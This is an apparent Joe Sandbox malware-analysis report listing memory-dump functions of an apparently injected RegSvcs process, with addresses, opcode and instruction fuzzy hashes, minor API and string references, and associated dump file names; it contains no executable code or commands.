Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 36c6f9582484aedd37c553e03601d4e383e85156a9177d04e5035063c5c2bb69
Instruction ID: a58cefab2c3b28726643c4a49e0f7dbd708db43dce34d148186d5c3aaef31ae9
Opcode Fuzzy Hash: 36c6f9582484aedd37c553e03601d4e383e85156a9177d04e5035063c5c2bb69
Instruction Fuzzy Hash: 6541F071550312AFC726EB68DC44B6B77E8FF84754F004A2AB949DB390EB74D8108B96

Function 015FEBFC Relevance: 1.6, APIs: 1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85fb8107cd312acd26a5f667e9964994f69e84109b7ed02c17e01fbe36532555
Instruction ID: c0684afdbf563e6704d235d9e76b94ded0cac422a050eaa40daa086b7512741d
Opcode Fuzzy Hash: 85fb8107cd312acd26a5f667e9964994f69e84109b7ed02c17e01fbe36532555
Instruction Fuzzy Hash: 1B41D2726003029FD725DF28CC89A2BB7E9FF88314F01486EEA56CB765DB71E8448B51

Function 015C64BA Relevance: 1.6, APIs: 1, Instructions: 123timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 015C656C

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: b275ee50d392c5bf54a3a4deb676357344f1bb901c73a44403afb5cdf524acd3
Instruction ID: df50540baae68f86769fda5daebb357c536f2278f64c7362367bdaae6568da28
Opcode Fuzzy Hash: b275ee50d392c5bf54a3a4deb676357344f1bb901c73a44403afb5cdf524acd3
Instruction Fuzzy Hash: 8541E2712483219FE724EE54DC81BAB77E5FBC0B48F44481DE986AB250D770E900CFA2

Function 015D262C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 015D2710

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 2b828c831fe84a4ba3e48018d31e6489219a9fa843916dcacc41359e29a3ceff
Instruction ID: 41f1741ab3469ac615cc790054f25ee03e2e57aca77487e5477c27dd652f2669
Opcode Fuzzy Hash: 2b828c831fe84a4ba3e48018d31e6489219a9fa843916dcacc41359e29a3ceff
Instruction Fuzzy Hash: 044168B19017019FCB36EF2CC940A6AB7B2FF94710F1586ADC4069B6A5DB30A942CB51

Function 016507C3 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0165083C

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 905745021e880a1406fbdf0f50f0974a89a77652854b57881d9b1516742476b0
Instruction ID: 6a688a2de79c17cddf31c3bfbd47ae26257b555a613bf950009dd6f992dce5ca
Opcode Fuzzy Hash: 905745021e880a1406fbdf0f50f0974a89a77652854b57881d9b1516742476b0
Instruction Fuzzy Hash: 9C4156B2508301AFD760DF29CC45BABBBE8FB88754F104A2EF99897250D770D904CB96

Function 015F245A Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5581d41f5e623263ffde65e415d1d0dbd57e72b5ab286a39e9d871674244ae69
Instruction ID: 574b27f3dc56f85adccc4817696a72afc61ff4963dcf20720b55951992d199be
Opcode Fuzzy Hash: 5581d41f5e623263ffde65e415d1d0dbd57e72b5ab286a39e9d871674244ae69
Instruction Fuzzy Hash: 07315772A00202EFDB319F9DDC85ABA7BB5FBC0B04F56405DE951AB345C7B0A892D790

Function 015D4859 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 015D48F7

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 4bf51e1ba84ae4899cc838c3693924b934004c0ffd356737965bbb756c26e39f
Instruction ID: 0e315c0ab3d008891a9f34bab6c53e2ded79a0628b87b7184bcde976f25dd733
Opcode Fuzzy Hash: 4bf51e1ba84ae4899cc838c3693924b934004c0ffd356737965bbb756c26e39f
Instruction Fuzzy Hash: 27418D306003028BD735DF2ED884B3ABBEABF80354F14486DE6858F691DB70D951CB91

Function 015C8A00 Relevance: 1.6, APIs: 1, Instructions: 85timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 015C8A8B

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: c9b966ef6107264e5b10d915474bacdae3ab1258d31d063f56933b7a0424435a
Instruction ID: 20f1859e094f48235f0fa27dbcd9d2afbc1cf7648573821a9c9b8a159d84f40a
Opcode Fuzzy Hash: c9b966ef6107264e5b10d915474bacdae3ab1258d31d063f56933b7a0424435a
Instruction Fuzzy Hash: 4F31CE75A00A46EFCB26DFA8DD40B6DB7B1FF48720F084559D8025BB81C775A890DFA1

Function 0165892A Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15b64a91e5464e2bb10114fd8857cc2e3cacbc7134ce7472fbdfcfacdf2135df
Instruction ID: 7de541ab1334f7e9c1a207f1127c818381ec61bd4b38c82b47e337dce9791d41
Opcode Fuzzy Hash: 15b64a91e5464e2bb10114fd8857cc2e3cacbc7134ce7472fbdfcfacdf2135df
Instruction Fuzzy Hash: 9401F7313102129FE7745E5F8C84A767BBAFFC5794F04101CFA421BA51CB206841C796

Function 0165A4B0 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0165A51A

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 5389d193847442bbde31be39ac733e8feb2d6d2a164a6f31e2c685cf8a6d1310
Instruction ID: 055359648ee47e0425ffaf328ab21d6a9b66753bea7259b150a77d049d6cdfa7
Opcode Fuzzy Hash: 5389d193847442bbde31be39ac733e8feb2d6d2a164a6f31e2c685cf8a6d1310
Instruction Fuzzy Hash: 65018536100209AFCF129E84DC40EDA3F66FB4C768F068205FE1966220C732E971EB81

Function 01658D20 Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01658D6A

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: e1ed906930cd740d32d5bdcef7e371546dade1770ea9c1bf1aa8782c9200bd8d
Instruction ID: 5d4eb1208d872d55b1cb6435736950a32e1749a23ff47030e2bedcc26b4db9d2
Opcode Fuzzy Hash: e1ed906930cd740d32d5bdcef7e371546dade1770ea9c1bf1aa8782c9200bd8d
Instruction Fuzzy Hash: F5F090336002446FE7316A1DAC48B6BFBDEFBD4720F095519FD462B61187346C90CB80

Function 01656420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 016565C1

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 1111384ec3e5a62d0971887b5f1025ed68f7fd254518c205c28450c814737cab
Instruction ID: 22209e6821cd249604adc680a92496fa4125d942b7f5bdb6b2aebaae02e6d900
Opcode Fuzzy Hash: 1111384ec3e5a62d0971887b5f1025ed68f7fd254518c205c28450c814737cab
Instruction Fuzzy Hash: F2916072A4121AAFEB21DF95CC85FAE7BB8FF54750F500059FB01AB290D774A900CBA0

Function 01608402 Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 01608591

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: bd20fc86b6e0bd57182340300a020366d374362ffa86141fdc8d58faa96fa358
Instruction ID: 59944b8c8c1456663656474180d0f56e52deb995272110f84f95f3b3a6d0ed7c
Opcode Fuzzy Hash: bd20fc86b6e0bd57182340300a020366d374362ffa86141fdc8d58faa96fa358
Instruction Fuzzy Hash: 1C91AB71948346AFD722DE25CC91EABBAECBF84744F44092EFA8597181E330D904CB66

Function 0160273C Relevance: 1.5, Strings: 1, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 016028D8

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: .Local
API String ID: 0-5346580
Opcode ID: 79746271e5b254eb27d46fe36533d4b7297c122381c44fbec6ae47a4acdc2c4d
Instruction ID: 94f2e889ea092abc76f080262eb3a1647f474771911344da2cdc4a8fd47744e0
Opcode Fuzzy Hash: 79746271e5b254eb27d46fe36533d4b7297c122381c44fbec6ae47a4acdc2c4d
Instruction Fuzzy Hash: E3A1D531900219DBDB29CF59DC98BAAB3B5BF58354F2541EDE908AB391D7309E81CF80

Function 015CA197 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 0162C1E4

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: \??\
API String ID: 0-3047946824
Opcode ID: 1cd7e6150524bd35aa5331f5b445ed5f7c2989bdc84474c0333c336359c55d57
Instruction ID: 8bc3c06dc80826c243a5d69660bae3a453715a5af14a364c1deefb4afc7c35e9
Opcode Fuzzy Hash: 1cd7e6150524bd35aa5331f5b445ed5f7c2989bdc84474c0333c336359c55d57
Instruction Fuzzy Hash: 97A16B719016399BDB319F68CC88BAEB7B9FF44710F1001E9EA09AB250E7359E84CF54

Function 01608620 Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

8, xrefs: 016452E3

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 20261bf77cc388639945ce0c763c8a305bb82503892bb1ba6c1717fa52ce18fc
Instruction ID: 4a10e43ff90a70322e720f84d1c73139cb591d2c6e11b811d0e77094add00023
Opcode Fuzzy Hash: 20261bf77cc388639945ce0c763c8a305bb82503892bb1ba6c1717fa52ce18fc
Instruction Fuzzy Hash: BA819EB1A01359EFDB21CF99CC81BAEBBB9FB48714F244119F505BB280D3B5A941CB90

Function 01608BF0 Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

(, xrefs: 01608D3B

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 9b21d387ae122ef93dfee20a7c4a230f533834f4b8ad5e09727162ef79e35300
Instruction ID: 716d1200c2fe2b30c5badb475f0e27659b67f86eddd4138fbd12242054365402
Opcode Fuzzy Hash: 9b21d387ae122ef93dfee20a7c4a230f533834f4b8ad5e09727162ef79e35300
Instruction Fuzzy Hash: 3F915771D00649CFDB26DFA8C840ADEBBF5BF99314F20426AE816AB391D771A941CF50

Function 015E2F7B Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

, xrefs: 015E31A3

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 74ed58e904797a87f45c3e92ca41a2f07882223e5293782c8da88d09b73e051b
Instruction ID: 19c61fed82d7f6c9527eb89618b9b58f8308c25a8d5844dc4f7f1ed2fd800d95
Opcode Fuzzy Hash: 74ed58e904797a87f45c3e92ca41a2f07882223e5293782c8da88d09b73e051b
Instruction Fuzzy Hash: 83919931E002499FDB6ACFA8D888BACBBF1FF44710F148469E856AB352D735A940CF00

Function 015E2F47 Relevance: 1.4, Strings: 1, Instructions: 190COMMON

Download Yara Rule

Strings

, xrefs: 015E31A3

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 58af049234acc2825d10d792656a02c30e4f2578adb062c98d86e69b266236fd
Instruction ID: 220fbd1735c06a7349d25a8521495d343c11a2ef36d80f0a1eda8c782ea83e33
Opcode Fuzzy Hash: 58af049234acc2825d10d792656a02c30e4f2578adb062c98d86e69b266236fd
Instruction Fuzzy Hash: A6816A31E042489FDB6ACFA8D888BACBBF1FF45710F188469E955AF752D735A940CB10

Function 015E2F5B Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

, xrefs: 015E31A3

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
